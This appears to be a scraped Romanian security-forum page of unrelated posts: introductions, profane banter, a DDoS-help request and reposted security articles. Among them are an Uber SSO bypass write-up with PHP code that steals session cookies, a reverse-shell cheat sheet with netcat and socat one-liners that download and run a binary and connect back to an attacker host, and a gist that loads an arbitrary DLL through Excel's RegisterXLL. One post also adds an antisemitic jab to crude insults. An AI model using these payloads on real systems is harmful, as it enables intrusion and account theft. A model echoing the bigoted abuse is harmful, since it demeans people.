Leaderboard

Salut, Imi pare bine ca am gasit acest forum.. de multa vreme ma intrebam unde as putea gasi o comunitate de oameni pasionati de securitate cu care sa pot schimba idei. Mersi Alex de recomandare ! Am 29 de ani, lucrez in IT ca administrator pt diverse sisteme, si pe langa asta fac un Master in IT Security la Facultatea de Stiinte Aplicate Technikum din Vienna (am terminat primul an). Am copilarit printre "hackeri", iar in timpul liceului eram script kiddie, imi placea sa le fac farse vecinilor/colegilor, etc.. dar nu vreau sa intru in detalii, ca poate citeste vreunul.. Dupa liceu visul meu era sa ma fac Database Administrator si am invatat domeniul asta calumea, dar apoi m-am plictisit de el. De vreo 3 ani la munca dupa un proiect de securitate in care a trebuit sa schimbam toate sistemele ca sa fie conforme cu anumite standarde de securitate, mi-am dat seama cat de fain e domeniul securitatii si am inceput sa invat in special de pe cybrary, apoi m-am bagat la master pt ca mi-am dat seama ca am nevoie de cineva care sa ma indrume ce anume sa invat.. Datorita cursurilor de la facultate si a cursurilor de pe cybrary si HackingDojo (nu recomand), am invatat un pic de hacking: Web (xss, csrf, SQL injection, RCE, LFI, path traversal), OS/App: buffer overflows, DLL hijacking, DLL forwarding, information gathering, Privilege escalation, Kerberos hacking, creare de module metasploit. Dar de fapt nu ma intereseaza asa de tare sa invat hacking, vreau doar sa stiu ce e posibil...care sunt tehnicile de hacking. Sunt alte domenii din securitate care ma intereseaza mai tare.. Criptografie, Securitatea Protocoalelor: TLS, DNSSEC, IPSEC, protocoale de autentificare si autorizare, Security Detection and Defense...etc.. Programare : C#- destul de bine, python - mediocru, Ruby, Java- ma descurc.

Salut Radu, Desigur, te ajutam cu placere daca ne raspunzi la urmatoarele intrebari: - ce e aia flood? - ce e aia domeniu DDoS? - care este diferenta dintre cei doi termeni de mai sus? - ce vrei sa faci mai exact? - de ce vrei sa faci asta? - esti metinar? - crezi ca rezolvi ceva facand asta? Uite, din partea celor care inteleg divinitatea absoluta si astralul concurential: .-. .-. |U| | | | | | | | | | | _| |_ _| |_ | | | |-. | |_| |-. /| ` | / )| |_|_| | | | | |-' `-^-' | | | || | \ / \ ' / | | | | | | | | Cu stima, eu

Static code analyzer for C, C++ and C# PVS-Studio is a tool for bug detection in the source code of programs, written in C, C++ and C#. It works in Windows and Linux environment. PVS-Studio performs static code analysis and generates a report that helps a programmer find and fix bugs. PVS-Studio performs a wide range of code checks, it is also useful to search for misprints and Copy-Paste errors. Examples of such errors: V501, V517, V522, V523, V3001. The main value of static analysis is in its regular use, so that errors are identified and fixed at the earliest stages. There is no point in wasting 50 hours looking for a bug that could be found with static analysis. So, let's point out that again - the main idea of static analysis is not to find one hidden bug on the day before the release, but to fix dozens of bugs day by day. The analyzer can be run at night on the server and warn about suspicious code fragments. Ideally, these errors can be detected and fixed before getting into the repository. PVS-Studio can automatically be launched immediately after the compiler for the files that have been just modified. It works in Windows and Linux. Download PVS-Studio for Windows x64 PVS-Studio_setup.exe 56 Mb Download PVS-Studio for Linux (x64 only) .deb 4 Mb .tgz 7 Mb .rpm 4 Mb Source: https://www.viva64.com/en/pvs-studio/

Conversatie la un alt nivel pe semi-comunitatea noastra de IT-isti. Sfanta evanghelie trebuie propovaduita si aici http://sprunge.us/JNjG

Forex? Bani Matematica Informatii Iti dau un exemplu bitcoin aflasem de Bitcoin cand era pe duca liberty reserved un Bitcoin Costa 90 centi am vrut sa cumpar si eu dar ce Masa fac cu ei? Citisem ca un American si a cumparat pizza cu Bitcoin in valoare de 13 Bitcoin family size... Apoi am vrut sa cumpar 1 Bitcoin ca sa nu mor prost. Dar la fel de fraier am trecut la Alta idee...... True story the sfarsit

Salut, degeaba spui ca te-ai mutat de pe c++ pe perl deoarece nimeni nu o sa te creada, n-ai cum sa te muti de pe c++ atat timp cat nu ai facut nimic in c++. Toate bune si frumoase, de ce dracu ai invata perl pentru a da flood? Mai are cineva internet prin dial-up, sau care e faza? Totusi, daca chiar vrei sa inveti sa faci treaba asta, iti las niste link-uri https://seanhamptoncole.wordpress.com/2012/11/15/how-to-stop-being-stupid-in-10-easy-steps/ http://bfy.tw/CnSG

Authentication bypass on Uber’s Single Sign-On via subdomain takeover Posted on June 25, 2017 by Arne Swinnen TL;DR: Uber was vulnerable to subdomain takeover on saostatic.uber.com via Amazon CloudFront CDN. Moreover, Uber’s recently deployed Single Sign-On (SSO) system at auth.uber.com, which is based on shared cookies between all *.uber.com subdomains, was found vulnerable to session cookie theft by any compromised *.uber.com subdomain. Therefore, the impact of the subdomain takeover could be increased to Authentication Bypass of Uber’s full SSO system, yielding access to all *.uber.com subdomains protected by it (e.g. vault.uber.com, partners.uber.com, riders.uber.com, etc). Uber resolved the subdomain takeover vulnerability and granted a $5.000 bounty for the two combined issues. Single Sign-On security revisited Generally, SSO systems are (variations of) any of the following three types, in order of popularity: OAuth: Security is mainly based on whitelisted callback URLs of service providers configured at the identity providers, and CSRF protection via the “state” parameter. Flaws are often via open redirect chains, e.g. Authentication bypass on Airbnb via OAuth tokens theft. SAML & friends: Security is based on XML messages signed with pre-exchanged cryptographic keys between service and identity providers. Flaws are often XML Signature bypasses, e.g. OneLogin authentication bypass on WordPress sites that bit Uber before. Shared (session) cookies between subdomains: Security is based on the integrity of all subdomains. Any vulnerability on any subdomain that provides an attacker insight in the shared session cookies issued by the SSO system is fatal. Flaws are thus often RCE, debug logs exposure, subdomain takeover and friends on subdomains, e.g. Authentication bypass on Ubiquity’s Single Sign-On via subdomain takeover I personally believe that the first two in this list have had many problems in the past, but have improved lately in terms of security. The latter SSO based on shared session cookies between subdomains is more a technology from the past, before the former two even existed. By design, it enforces that anything that wants to leverage the SSO system to be a subdomain of the same TLD as where the SSO system is based. Since the security of the SSO system is based on the integrity of the subdomains (see aforementioned report and the Uber case below), this is quite an ironic situation. By design, it encourages to increase the attack surface enormously. Uber case Uber used OAuth as an SSO system for *.uber.com subdomains in the past, as can be seen from this recent public disclosure report by @ngalog: [Uber 8k Bug] Login CSRF + Open Redirect = Account Takeover. However recently, they’ve changed (reverted?) to a SSO system based on shared session cookies among subdomains of *.uber.com. If you now browse to any uber.com subdomain that requires authentication (e.g. central, partners, riders, vault, developer, …), you get redirected to auth.uber.com instead. Once you’ve logged in there and you visit another subdomain, you’re logged in there transparently via the SSO system at auth.uber.com, which issues temporary session cookies for every *.uber.com subdomain after being logged in once. A vulnerability was identified in this SSO system that allows any compromised subdomain on *.uber.com to transparently issue and steal valid session cookies issued for *any* uber.com subdomain by auth.uber.com, as long as the victim had already authenticated once to the SSO. Uber did have some countermeasures in place to prevent this, but these were bypassed and reported together with the subdomain takeover for increased impact. Any compromised *.uber.com subdomain could be used to perform the same attack, although Uber explicitly mentioned several *.uber.com subdomains as out of scope in their bug bounty program policy at the time of reporting (e.g. *.dev.uber.com, *.et.uber.com, drive.uber.com, etc). Subdomain takeover Subdomain saostatic.uber.com was pointing to Amazon Cloudfront CDN via a DNS CNAME, but the hostname was not registered there anymore (dangling pointer). This allowed me to fully takeover this domain, highly similar to Subdomain takeover on rider.uber.com due to non-existent distribution on Cloudfrontby Frans Rosén. I effectively took over the subdomain as a Proof of Concept and hosted a simple HTML file as proof here: Authentication bypass In Uber’s SSO system, auth.uber.com acts as Identity Provider and issues temporarily shared session cookies for https://*.uber.com (“domain=uber.com” cookie attribute) to communicate identities to Service Providers (e.g. riders.uber.com, partners.uber.com, central.uber.com, vault.uber.com, developer.uber.com, and many more). Service Providers on their end immediately destroy the incoming temporary shared session cookies in case of erroneous (e.g. issued for other Service Provider) or successful authentication to ensure that the window for theft is small, as can be seen in the below Uber SSO Login diagram: The precious shared session cookie “_csid” can thus only be stolen between steps 9-12, which is a very short period (automatic browser redirects). Although not impossible to exploit (see Jack Whitton’s awesome CSP trick to block certain cookies from being sent to certain domains, coincidentally also on Uber’s bug bounty program), a more convenient flaw was identified that allows the shared session cookie to remain alive after step 12 in the browser’s cookie store in the diagram above. The issue is that, if the victim is already logged in at https://riders.uber.com (situation after last step 12 in diagram) when receiving a request containing a valid newly generated shared session cookie “_csid” from auth.uber.com, it is simply ignored and remains usable. Hence it stays alive in the browser until its cookie store is cleared. An attacker simply needs to replay step 3 in the above diagram as step 13 and end with an additional hidden request to https://saostatic.uber.com to steal the precious session cookie: So once an attacker gets his/her hands on the victim’s “_csid” shared session cookie for https://riders.uber.com, he/she can execute the normal login flow in their own browser and replace the issued “_csid” cookie value in step 9 to be logged in as the victim, right? Wrong. Uber had another surpising countermeasure in place, namely a variant of login cross-site request forgery protection. This is the actual updated Uber SSO Login diagram: The problem here are the GET param state=CSRFTOKEN and locally scoped state cookie that are added in step 3 by the Service Provider riders.uber.com and verified in step 11. Since we can’t steal these values from the victim’s browser, but only the “_csid” shared session cookie, this means game over, right? Unfortunately, wrong. An attacker can obtain a proper CSRFTOKEN value and accompanying state cookie value from https://riders.uber.com by starting a normal login scenario on their end (e.g. in their own browser or via a simple script). He/she can then relay the auth.uber.com URL generated by https://riders.uber.com in their own browser in step 3 to the victim’s browser to generate & steal the “_csid” shared session cookie for these values, and inject these in his/her own browser login scenario again in step 9. In this manner, the victim effectively generates the “_csid” temporary session token for the attacker’s login scenario in a separate browser, but this works flawlessly (e.g. no IP-based checks between steps were encountered). This still allows exploitation and thus victim impersonation in the following manner (we still assume that the victim is already logged in to auth.uber.com and visits a webpage under control by the attacker, so we basically continue the flow from the above diagram): Proof of concept A PoC says more than a thousand diagrams. In the PoC steps sent to Uber & showcased in the video below, the assumption is made that https://saostatic.uber.com is actually serving a valid SSL certificate in the victim’s browser, which was not the case. However, it could’ve easily been generated with Let’s Encrypt. Open the victim’s browser & browse to https://riders.uber.com. After being redirected to https://auth.uber.com, login with the victim’s credentials so you end up on https://riders.uber.com trips dashboard again. Open a second browser tab in the victim’s browser and browse to https://saostatic.uber.com/prepareuberattack.php. Accept any certificate warnings that you may receive here – again, we’re only simulating that the domain has a valid SSL certificate. Once the page has finished loading you should see a URL, “Cookie: ” string and a “Set-Cookie: ” strings underneath each other. This is all info gathered under the hood by the attacker’s webserver that is required to login as the victim now – everything has been stolen automagically. Open the separate attacker’s browser and setup an intercepting proxy tool to intercept requests and responses. Browse to the URL displayed on the prepareuberattack.php page output and intercept this request. Now copy the “Cookie: …” string displayed on prepareuberattack.php and paste it into the request headers. The response should be a redirect to https://riders.uber.com/trips, indicating successful authentication bypass. Last but not least, copy all the “Set-Cookie: ” lines from the prepareuberattack.php page output and paste them in the response before forwarding it to the browser. This ensures that the stolen cookies are permanently injected in the attacker’s browser. You are now logged in as the victim in the attacker’s browser. In a real attack scenario, an attacker would stealthily load https://saostatic.uber.com/prepareuberattack.php in the victim’s browser, e.g. through an iframe. Likewise, he/she would probably not display the URL and all the cookies on the resulting page, but store this on the server-side, ready to be abused in a stealthy fashion. Although it’s a lengthy explanation, the PoC video showcases how quick & effective exploitation by an attacker can be. The code of the https://saostatic.uber.com/prepareuberattack.php and https://saostatic.uber.com/uberattack.php pages is provided below. This was written quick & dirty for PoC purposes, but it did the job: prepareuberattack.php PHP 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 <html> <body> <script> <?php function HandleHeaderLine( $curl, $header_line ) { preg_match("/state=([^;]*);/", $header_line, $matches); if(sizeof($matches) > 0) { print("var cookiestate = '" . $matches[1] . "';\n"); } preg_match("/Location: (.*)/", $header_line, $matches); if(sizeof($matches) > 0) { print("var loc = '" . trim($matches[1]) . "';\n"); } return strlen($header_line); } $c = curl_init('https://riders.uber.com'); curl_setopt($c, CURLOPT_VERBOSE, 1); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_HEADERFUNCTION, "HandleHeaderLine"); $page = curl_exec($c); ?> var csrf = loc.substring(loc.lastIndexOf("=")+1); var img = document.createElement("IMG"); img.onerror = function () { var iframe = document.createElement("iframe"); iframe.setAttribute("src","https://saostatic.uber.com/uberattack.php?cookiestate=" + encodeURIComponent(cookiestate) + "&csrftoken=" + csrf); iframe.setAttribute("width", "100%"); iframe.setAttribute("height", "10000"); document.body.appendChild(iframe); } img.src=loc; </script> </body> </html> uberattack.php PHP 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <html> <body> <?php $cookiestring = "state=" . $_GET["cookiestate"] . "; "; $interestincookies = array("_udid", "_csid", "sid"); foreach ($_COOKIE as $name => $value) { if (in_array($name,$interestincookies)) { $cookiestring = $cookiestring . $name . "=" . str_replace(' ', '+', $value) . "; "; $cookiestringset = $cookiestringset . "Set-Cookie: " . $name . "=" . str_replace(' ', '+', $value) . ";</br>"; } } print "Url: " . 'https://riders.uber.com/?state=' . urlencode($_GET["csrftoken"]) . "<br /><br />"; print "Cookie: " . $cookiestring . "<br />"; print "<br />" . $cookiestringset . "<br />"; ?> </body> </html> The first file can be hosted anywhere, the second file must be hosted on the hijacked subdomain (since it reads & reflects the incoming session cookies). By simply changing “riders.uber.com” to any other subdomain of uber.com in these two PHP files, an attacker could generate valid sessions for these subdomains on behalf of the victim, e.g. vault.uber.com, partners.uber.com, developer.uber.com, … Recommendations The recommendations provided to Uber were twofold: Resolve the subdomain takeover of saostatic.uber.com by removing the dangling CNAME to AWS CloudFront CDN. Resolve the Authentication Bypass issue by any of the following, in order of priority: Revert the SSO system back to OAuth 2, since this does not have the side-effect of actually encouraging a large attack surface like the current shared session SSO system. Or, implement an IP address check: Store a user’s external IP address when issuing a shared “_csid” session cookie on auth.uber.com (identity provider) and verify that users presenting this shared session cookie to service providers on *.uber.com have the same external IP address, to prevent relay attacks like the one described above. There is a residual risk here, namely when the attacker has the same external IP address as its victim (e.g. on the same corporate network/wireless access point/…). Or, accept the inherent risk and include all *.uber.com subdomains in your bug bounty program scope, since they have the potential to fully compromise the SSO system, including the high-value targets vault.uber.com, partners.uber.com and riders.uber.com Ultimately, Uber removed the dangling CNAME and decided to implement the IP address check to decrease the exposed risk through their current cookie based SSO system. They thus opted to accept the residual risk involved. Timeline 07/04/2017: Submitted bug report to Uber 11/04/2017: Triaged by Uber 14/04/2017: $500 minimum bounty awarded 06/06/2017: Pinged Uber about the report, since I still owned saostatic.uber.com at this point 06/06/2017: Response from Uber that this report fell through the cracks, starting mitigations now 07/06/2017: DNS CNAME record for saostatic.uber.com removed, report marked as closed 14/06/2017: Extra $4.500 bounty awarded 07/07/2017: IP address check deployed by Uber and confirmed after retest 11/07/2017: Permission granted to publish blogpost by Uber Arne Swinnen Belgian. IT Security. Bug Bounty Hunter. Sursa: https://www.arneswinnen.net/2017/06/authentication-bypass-on-ubers-sso-via-subdomain-takeover/

Upgrading simple shells to fully interactive TTYs 10 JULY 2017 Table of Contents Generating reverse shell commands Method 1: Python pty module Method 2: Using socat Method 3: Upgrading from netcat with magic tl;dr cheatsheet Every pentester knows that amazing feeling when they catch a reverse shell with netcat and see that oh-so-satisfying verbose netcat message followed by output from id. And if other pentesters are like me, they also know that dreadful feeling when their shell is lost because they run a bad command that hangs and accidentally hit "Ctrl-C" thinking it will stop it but it instead kills the entire connection. Besides not correctly handling SIGINT, these"dumb" shells have other shortcomings as well: Some commands, like su and ssh require a proper terminal to run STDERR usually isn't displayed Can't properly use text editors like vim No tab-complete No up arrow history No job control Etc... Long story short, while these shells are great to catch, I'd much rather operate in a fully interactive TTY. I've come across some good resources that include very helpful tips and techniques for "upgrading" these shells, and wanted to compile and share in a post. Along with Pentest Monkey, I also learned the techniques from Phineas Fisher in his released videos and writeups of his illegal activities: Pentest Monkey - Post Exploitation Without a TTY Phineas Fisher Hacks Catalan Police Union Website Phineas Fisher - Hackingteam Writeup For reference, in all the screenshots and commands to follow, I am injecting commands in to a vulnerable web server ("VICTIM") and catching shells from my Kali VM ("KALI"): VICTIM IP: 10.0.3.7 KALI IP: 10.0.3.4 Generating reverse shell commands Everyone is pretty familiar with the traditional way of using netcat to get a reverse shell: nc -e /bin/sh 10.0.3.4 4444 and catching it with: nc -lvp 4444 The problem is not every server has netcat installed, and not every version of netcat has the -e option. Pentest Monkey has a great cheatsheet outlining a few different methods, but my favorite technique is to use Metasploit's msfvenom to generate the one-liner commands for me. Metasploit has several payloads under "cmd/unix" that can be used to generate one-liner bind or reverse shells: Any of these payloads can be used with msfvenom to spit out the raw command needed (specifying LHOST, LPORT or RPORT). For example, here's a netcat command not requiring the -e flag: And here's a Perl oneliner in case netcat isn't installed: These can all be caught by using netcat and listening on the port specified (4444). Method 1: Python pty module One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. The pty module let's you spawn a psuedo-terminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade a dumb shell, simply run the following command: python -c 'import pty; pty.spawn("/bin/bash")' This will let you run su for example (in addition to giving you a nicer prompt) Unfortunately, this doesn't get around some of the other issues outlined above. SIGINT (Ctrl-C) will still close Netcat, and there's no tab-completion or history. But it's a quick and dirty workaround that has helped me numerous times. Method 2: Using socat socat is like netcat on steroids and is a very powerfull networking swiss-army knife. Socat can be used to pass full TTY's over TCP connections. If socat is installed on the victim server, you can launch a reverse shell with it. You must catch the connection with socat as well to get the full functions. The following commands will yield a fully interactive TTY reverse shell: On Kali (listen): socat file:`tty`,raw,echo=0 tcp-listen:4444 On Victim (launch): socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 If socat isn't installed, you're not out of luck. There are standalone binaries that can be downloaded from this awesome Github repo: https://github.com/andrew-d/static-binaries With a command injection vuln, it's possible to download the correct architecture socat binary to a writable directoy, chmod it, then execute a reverse shell in one line: wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 On Kali, you'll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGSTP support, vim, up arrow history, etc. It's a full terminal. Pretty sweet. Method 3: Upgrading from netcat with magic I watched Phineas Fisher use this technique in his hacking video, and it feels like magic. Basically it is possible to use a dumb netcat shell to upgrade to a full TTY by setting some stty options within your Kali terminal. First, follow the same technique as in Method 1 and use Python to spawn a PTY. Once bash is running in the PTY, background the shell with Ctrl-Z While the shell is in the background, now examine the current terminal and STTY info so we can force the connected shell to match it: The information needed is the TERM type ("xterm-256color") and the size of the current TTY ("rows 38; columns 116") With the shell still backgrounded, now set the current STTY to type raw and tell it to echo the input characters with the following command: stty raw -echo With a raw stty, input/output will look weird and you won't see the next commands, but as you type they are being processed. Next foreground the shell with fg. It will re-open the reverse shell but formatting will be off. Finally, reinitialize the terminal with reset. Note: I did not type the nc command again (as it might look above). I actually entered fg, but it was not echoed. The nc command is the job that is now in the foreground. The reset command was then entered into the netcat shell After the reset the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above) $ export SHELL=bash $ export TERM=xterm256-color $ stty rows 38 columns 116 The end result is a fully interactive TTY with all the features we'd expect (tab-complete, history, job control, etc) all over a netcat connection: The possibilities are endless now. Tmux over a netcat shell?? Why not? tl;dr cheatsheet Cheatsheet commands: Using Python for a psuedo terminal python -c 'import pty; pty.spawn("/bin/bash")' Using socat #Listener: socat file:`tty`,raw,echo=0 tcp-listen:4444 #Victim: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 Using stty options # In reverse shell $ python -c 'import pty; pty.spawn("/bin/bash")' Ctrl-Z # In Kali $ stty raw -echo $ fg # In reverse shell $ reset $ export SHELL=bash $ export TERM=xterm-256color $ stty rows <num> columns <cols> Any other cool techniques? Let me know in the comments or hit me up on twitter. Enjoy! -ropnop Sursa: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Verizon, the major telecommunications provider, has suffered a data security breach with over 14 million US customers' personal details exposed on the Internet after NICE Systems, a third-party vendor, mistakenly left the sensitive users’ details open on a server. Chris Vickery, researcher and director of cyber risk research at security firm UpGuard, discovered the exposed data on an unprotected Amazon S3 cloud server that was fully downloadable and configured to allow public access. The exposed data includes sensitive information of millions of customers, including their names, phone numbers, and account PINs (personal identification numbers), which is enough for anyone to access an individual's account, even if the account is protected by two-factor authentication. NICE Systems is an Israel-based company that is known for offering wide-range of solutions for intelligence agencies, including telephone voice recording, data security, and surveillance. According to the researcher, it is unknown that why Verizon has allowed a 3rd party company to collect call details of its users, however, it appears that NICE Systems monitors the efficiency of its call-center operators for Verizon. The exposed data contained records of customers who called the Verizon's customer services in the past 6 months, which are recorded, obtained and analyzed by NICE. Interestingly, the leaked data on the server also indicates that NICE Systems has a partnership with Paris-based popular telecommunication company "Orange," for which it also collects customer details across Europe and Africa. Vickery had privately informed Verizon team about the exposure in late June, and the data was then secured within a week. Vickery is a reputed researcher, who has previously tracked down many exposed datasets on the Internet. Just last month, he discovered an unsecured Amazon S3 server owned by data analytics firm Deep Root Analytics (DRA), which exposed information of more than 198 Million United States citizens, that's over 60% of the US population. In March this year, Vickery discovered a cache of 60,000 documents from a US military project for the National Geospatial-Intelligence Agency (NGA) which was also left unsecured on Amazon cloud storage server for anyone to access. In the same month, the researcher also discovered an unsecured and publicly exposed database, containing nearly 1.4 Billion user records, linked to River City Media (RCM). In 2015, Vickery also reported a huge cache of more than 191 Million US voter records and details of as many as 13 Million MacKeeper users. Via thehackernews.com

Banned - 3 months and 30 days. Poate inveti ceva intre timp.

Si... ce sa le facem noi, sa-i luam de nevasta? Da-i in pula mea de muricani abjecti. ISPs de acolo oricum vand info clientilor pentru profit si 'nspemii de servicii secrete le urmaresc fiecare miscare, ca sanchi, teroristii. #JewPower

Execute DLL via the Excel.Application object's RegisterXLL() method BAT REM rundll32 mshtml.dll HTA one-liner command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close(); JS // Create Instace of Excel.Application COM object var excel = new ActiveXObject("Excel.Application"); // Pass in path to the DLL (can use any extension) excel.RegisterXLL("C:\\Users\\Bob\\AppData\\Local\\Temp\\evilDLL.xyz"); Powershell # Create Instace of Excel.Application COM object $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application")) # Pass in path to the DLL (can use any extension) $excel.RegisterXLL("C:\Users\Bob\Downloads\evilDLL.txt") Sursa: https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52

CVE-2017-4918: Code Injection in VMware Horizon’s macOS Client Mac OS X, Security, Software Add comments Jul 102017 In this blog post I want to discuss a code injection vulnerability in VMware Horizon‘s macOS Client Version 4.4.0 (5164329) that can be abused to gain local root privileges. The good news is, that it has already been fixed in the latest available version. I found it after learning about the “Open VMware View Client Services” SUID binary on my Mac. I think it is used internally by Horizon’s remote USB services and is only exploitable after they have been started once by entering administrative credentials. To investigate the binary further, I used the newly released Fireeye application Monitor.app. It basically is Process Monitor (procmon) for macOS. Based on the activities as captured by Monitor.app it was clear that “Open VMware View Client Services” was basically a wrapper around “services.sh”. This makes sense as the SUID bit is ignored for script files. After taking a closer look at this script, I identified the highlighted line in the following screenshot as a starting point for a possible code injection vulnerability. Although I had no idea about the inner workings of “./vmware-usbarbitrator” this binary was immediately my focus for further investigations. The reason for this is that I – as a non-admin user – am able to set the content of the environment variable VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONS – that is used in an SUID executed script. After taking a closer look at the possible command line options I was pretty sure I could abuse this setup to load a custom kernel extension by abusing the –kext flag. However, there are two further problems: Kernel Extensions are only loaded if they are owned by root : wheel Additionally, KEXTs the have to be signed by Apple. In the course of this LPE I will ignore issue #2. Hence, I disabled SIP. So let’s focus on issue #1. To successfully load a kernel extension the binary has to be owned by root : wheel. However, for a normal user it is impossible to set this file system permissions on a any local file. Luckily, I had already invested plenty of time to learn about the In’s and Out’s of file systems at Tools On Air. So I knew, the only thing I had to do was to abuse NFS. This is possible because NFS allows the server to specify the file system permissions, even if mounted by a user. Any other local or remote file system I know of, ignores files owned by root in some way. So my next step was to simply export a remote folder (on my Kali Linux I always carry around with me) using NFS… … and mount it using Finder’s “Connect to Server”. After creating a simple KEXT … and updating the Info.plist file to meet the requirements (simply add a dictionary “IOKitPersonalities”) we are ready! After copying this KEXT to the NFS server and adapting its permissions to meet the “root:wheel” requirement, we are finally able to start the real exploitation. To do so simply set the “VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONS” environment variable to our previously create KEXT and run “Open VMware View Client Services”. This is enough to load it! Hence, we gained code execution from a normal user’s account within the kernel context! Suggested Solution Filter or clear the environment variables VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONS and VMWARE_VIEW_USBD_LOG_OPTIONS. Disclosure Timeline 21-04-2017: The issues has been documented and reported 24-04-2017: VMware started investigating 06-06-2017: Fix ready 08-06-2017: Updated Horizon version 4.5 alongside security advisory VMSA-2017-0011 released Sursa: https://bogner.sh/2017/07/cve-2017-4918-code-injection-in-vmware-horizons-macos-client/

Hai sa iti povestesc ceva, poate o sa te opresti cu postarile astea. Am apreciat in multe din postarile tale trecute (legate de programare in general) ca incercai. Pula mea, nu iesea ceva, postai aici. Parea ca o sa ajungi undeva si ca o iei pe un drum okay. Acum daca ma uit in istoricu' postarilor tale, ai asa (ordine aleatoare): - fitness - PPI (sau cum pula mea se cheama cacatu' ala cu click-uri) - stomatologie - off-shores / dropshipping - forex - contabilitate - site de iteme cs-go - etc... Toate cele de mai sus intr-un interval super scurt. Acu' na, nu e nevoie sa ma asculti, majoritatea de aici stiu ca fac multa caterinca, stiu ca sunt un retardat, handicapat, prost si ca ma doare-n pula de absolut orice exista pe planeta asta in special tigani, biserica si politica. Unde vreau sa ajung cu asta? Cois, treziti-va "an" pula mea! Terminati cu forex / ppi / fbi / nsa / plm / fmm etc. Sau tineti-va in moloz de una din ele si bagati pana vedeti ca iese banu' sau ca esuati. Mai ales astia care aveti cate ceva la mansarda si puteti sa profitati de pe urma asta. Mi-aduc aminte ca si eu eram asa: - mama ce idee de aplicatie am. Devin milionar. - sa-mi bag pula ce idee mi-a venit, gata rup google apps - bag pula-n ea programare, ma apuc de poker. - ma fac futangiu pe macarale Si am tinut-o asa vreun an ca sa realizez ca eram un lache de doi lei (bine, si acum sunt) care nu facuse nimic, pierdea timpu' in pula cu satelitu' si cam atat. M-am oprit, m-am axat pe progra & stuff si acum ma doare in pula, fac ce-mi place si fac misto cu @fallen_angel @Gecko @badluck @aelius etc... pe chat cat sunt la birou pentru ca totu' mi se pare lejer si usor si fain. Unde sunt trilionarii ? Sunt peste tot man, doar ca ei nu deschid 9 topicuri pe luna, fiecare din ele avand un subiect total diferit. Baga-ti mintile in cap si revin-o in pula mea cu picioarele pe pamant. //PS: e misto sa pui intrebari, sa vrei sa stii chestii s.a.m.d... insa asta o poti face pe chat, in timpu' liber, cand iei o pauza de la ceea ce conteaza cu adevarat. In viata nu le poti avea pe toate //PS2: Pentru cei plictisiti de postarea mea, luati aici:

mov_0ah_01: lol mov_0ah_01: uite-i cum doarme pe mine mov_0ah_01: https://www.screencast.com/t/N2keqXvE3x aelius: partea dreapta a televizorului e mai lasata cu 1,5 cm aelius: sa pui bolobocul pe el :)))))) mov_0ah_01: e la boloboc pus aelius: =)))))))) nu e mov_0ah_01: ba e ma aelius: sa verifici, sa vezi mov_0ah_01: pare si mie di poza mov_0ah_01: dar cand l-am pus era la boloboc.. acum 4 ani aelius: s-a lasat fallen_angel: apoi de atunci au fost vreo 3 cutremure mov_0ah_01: nu e lipit de perete, poate d-aia arata asa mov_0ah_01: ma faci sa ma duc sa pun bolobocu pe el acum mov_0ah_01: ma injura nevasta-mea ca se uita la tv mov_0ah_01: nesimtitule aelius: exact 1,5 CM mov_0ah_01: nici nu mai pot dormii la noapte mov_0ah_01: bagami-as pula aelius: pune-l ma, e stramb, eu as darma peretele peste el in pula mea mov_0ah_01: =)))))))))))) aelius: nu-l mai suport aelius: nu stiu cum poti sta in casa cu tv-ul stramb aelius: o sa ramai si cu gatul asa dupa el, inclinat la 10 grade fata de orizontala mov_0ah_01: pai tu tii in pula mea capu` fix drept? aelius: da aelius: la boloboc mov_0ah_01: esti nebun mov_0ah_01: adahgdqa mov_0ah_01: sdasjhdasjfdhgsahahaha aelius: e stramb, sa-mi bag pula aelius: daca apare in film o masa cu un pahar de apa aelius: se vede inclinata apa in el ? aelius: ma furnicaie pielea cand vad tv-ul ala stramb aelius: pune femeia sa tina de televizor aelius: si trage tu putin de perete aelius: eu pe bune zic ca tv-ul e stramb aelius: ia uita-te atent la femeie, sta cumva cu capul inclinat ? mov_0ah_01: da, o fi stramb, posibil e... nu-mi mai pasa mov_0ah_01: PAI EA E FEMEIE ESTI TAMPIT mov_0ah_01: SI CAND STA DREAPTA E STRAMBA aelius: ma ia stai asa aelius: si catelu e stramb frate Vorbesc intre timp cu whois pe privat si spun sa-i puna un boloboc sub tv in poza. Ma mai gandesc 10 secunde si spun sa adauge inca un boloboc mic si pe cainele ala. Rezultat final: :))))))))))))))

Salutare mă numesc Radu și sunt începător în ale "flood-ului". De ceva timp m-am mutat de pe C++ pe Perl pentru a face un script de flood. Toate bune și frumoase, după câteva săptămâni de învățat perl la greu am reușit să fac ceva folosind funcția send(); Scriptul merge perfect însă am auzit la niște băieți că există ceva modalitate de flood folosind niște boți însă habar nu am cum se folosesc, etc. Mă poate băga un cunoscător în temă? Orice ajutor este primit dacă este legat de domeniul DDoS. Mulțumesc anticipat!!!